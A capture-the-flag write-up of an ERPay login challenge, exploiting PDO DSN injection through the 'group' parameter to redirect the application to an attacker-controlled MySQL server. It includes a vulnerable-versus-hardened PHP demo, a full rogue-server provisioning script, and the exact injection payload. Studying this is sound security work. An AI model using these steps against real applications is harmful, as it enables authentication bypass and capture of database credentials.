ERPay is a new ERP management application. You can now steal money from your employees and add it directly to your bank account!
This challenge was pretty cool, even if we were stuck on it for a long time 🙂
By going to whyunoknock.nuitduhack.com, we can see a login page. Obviously, the goal was to bypass it 🙂
We checked the parameters sent to the server with Burp and tried some classic tests, like, you know, SQL injection ^^
These tests were pretty useless because there is no injection at all, but at the time we didn't know it.
Our tests were mainly based on the group parameter. By changing it, the server replied with some error numbers.
By checking the error on the interwebs, we can see that error 1044 is MySQL's "access denied for user ... to database" error: the application's database user has no grants on the database we named.
Well… that's pretty obvious, because we actually asked it to connect to a database named "fake" x)
The interesting thing here is that playing with the group parameter gives us a PDOException, MySQL error number included: the application leaks its raw database errors to the client, which is what lets us watch what the backend is doing.
Moreover, during our tests, we saw that sending "users;" to the server didn't reply with some "STAHP DOING DUMB THINGS" exception.
Well well well… ";" doesn't crash, we have some PDO exceptions… We decided to check the PHP doc for the PDO class.
The constructor is defined as follows:
public PDO::__construct ( string $dsn [, string $username [, string $password [, array $options ]]] )
$dsn is a string containing the connection information, such as the database name or the host, as semicolon-separated key=value pairs. For MySQL it looks like this:
Oh. Wait. What? Did you see it? The vuln! It's here! In front of us! Since the beginning!
The group that we send in the auth request is obviously the dbname!
So… what if we inject more parameters into the DSN? Like, for example… a specific host!
Hmmm… Exception 2002, "Can't connect to MySQL server". As 18.104.22.168 doesn't have a MySQL instance, that seems legit 🙂 The application really did try to reach the host we named: the group value goes into the DSN unfiltered.
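To make the bug concrete, here is an added example (not the challenge's source, which we never saw) of a DSN assembled by string concatenation next to a hardened version. It assumes the application builds "mysql:host=localhost;dbname=<group>" from the group field of the login request; the database names in the allow-list are made up for the example.

```php
<?php
// Added example, not the challenge's source (which we never saw): how a DSN
// assembled by string concatenation is hijacked, and one way to close the hole.
// Assumed: the application builds "mysql:host=localhost;dbname=<group>" from
// the "group" field of the login request.
declare(strict_types=1);

// Vulnerable: whatever the client sent as "group" is spliced into the DSN.
function buildDsnVulnerable(string $group): string
{
    return 'mysql:host=localhost;dbname=' . $group;
}

// Hardened: the request value only selects an entry in a fixed map; the DSN is
// built from our own constant, so no client byte ever reaches the DSN parser.
const GROUP_TO_DB = [
    'users'  => 'erpay_users',   // assumed database names
    'admins' => 'erpay_admins',
];

function buildDsnSafe(string $group): string
{
    if (!array_key_exists($group, GROUP_TO_DB)) {
        throw new InvalidArgumentException('unknown group: ' . $group);
    }
    return 'mysql:host=localhost;dbname=' . GROUP_TO_DB[$group];
}

// The payload: a valid dbname followed by an extra key. PDO's DSN parser keeps
// the last value it sees for a given key, so this host= overrides the leading
// one (a port= could be appended the same way).
$malicious = 'users;host=192.168.1.100';

printf("vulnerable: %s\n", buildDsnVulnerable($malicious));

foreach ([$malicious, 'users'] as $group) {
    try {
        printf("safe:       %s\n", buildDsnSafe($group));
    } catch (InvalidArgumentException $e) {
        printf("safe:       rejected (%s)\n", $e->getMessage());
    }
}
```

Run it with php on the command line. The vulnerable builder hands PDO mysql:host=localhost;dbname=users;host=192.168.1.100, and PDO connects to the second host; the safe builder rejects the payload outright and, for the legitimate value, only ever emits a DSN made of its own constants. Keep in mind what the vulnerable path gives away on top of the auth bypass: the application sends its database user name and a challenge-response of its password to whichever host answers, and that response can be attacked offline.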
But we now know how to pwn the authentication! We just need to set up a MySQL instance and let the script connect to it.
After some network configuration, our MySQL service was up and running, waiting for a connection 🙂
By setting the host to our IP, we saw the script trying to authenticate against our instance (as there is NAT on our network, the web server shows up as 192.168.1.254 and the MySQL instance is 192.168.1.100).
Wonderful! We can now create an erpay user, and after some configuration, we saw the auth query coming.
The last step was to create a table named logins, with three columns: id, login, and password.
OK, now everything is set up, we just have to send the authentication request to the web server, and here it is!
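Here is the attacker-side setup from the steps above as one added example, written by the editor and not the team's own script. It is in PHP only to keep a single language on this page; the SQL statements are the substance and can just as well be pasted into the mysql client. Assumptions: MySQL already listens on 192.168.1.100 (bind-address changed from 127.0.0.1 in my.cnf), the root password and log path are placeholders, the application connects as user erpay with password "erpay" (the real one has to match whatever the application presents), it asks for database "users" (the value that produced no error above), and the login query compares login and password in logins(id, login, password) as plain text.

```php
<?php
// Added example of the attacker-side setup, not the team's own script.
// Provisions the rogue MySQL server the ERPay application will be pointed at.
// Assumed: MySQL listens on 192.168.1.100 (bind-address already changed in
// my.cnf), the application authenticates as erpay/erpay, asks for the
// database "users", and checks logins(id, login, password) by plain comparison.
declare(strict_types=1);

$admin = new PDO('mysql:host=127.0.0.1', 'root', 'root-password', [  // placeholder credentials
    PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
]);

$statements = [
    // Let the victim authenticate from anywhere on our network.
    "CREATE USER IF NOT EXISTS 'erpay'@'%' IDENTIFIED BY 'erpay'",
    "CREATE DATABASE IF NOT EXISTS `users`",
    "GRANT ALL PRIVILEGES ON `users`.* TO 'erpay'@'%'",
    // Same shape as the table the application queries.
    "CREATE TABLE IF NOT EXISTS `users`.`logins` (
        id INT AUTO_INCREMENT PRIMARY KEY,
        login VARCHAR(64) NOT NULL,
        password VARCHAR(128) NOT NULL
    )",
    // The credentials we will type into the login form.
    "INSERT INTO `users`.`logins` (login, password) VALUES ('attacker', 'attacker')",
    // Log every statement the victim sends, so the exact auth query can be read
    // back (and the table adjusted) before retrying the login. Placeholder path;
    // mysqld must be able to write there.
    "SET GLOBAL general_log_file = '/var/log/mysql/erpay.log'",
    "SET GLOBAL general_log = 'ON'",
];

foreach ($statements as $sql) {
    $admin->exec($sql);
}

echo "rogue server ready; send group=users;host=192.168.1.100 to the login form\n";
```

With the server provisioned, submit the login form with group set to users;host=192.168.1.100 (URL-encoded) and the attacker/attacker credentials. If the login still fails, read the general log: the exact query the application sent tells you which columns, hashing or extra conditions it expects, and you adjust the row to match and try again.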
The flag came to us 🙂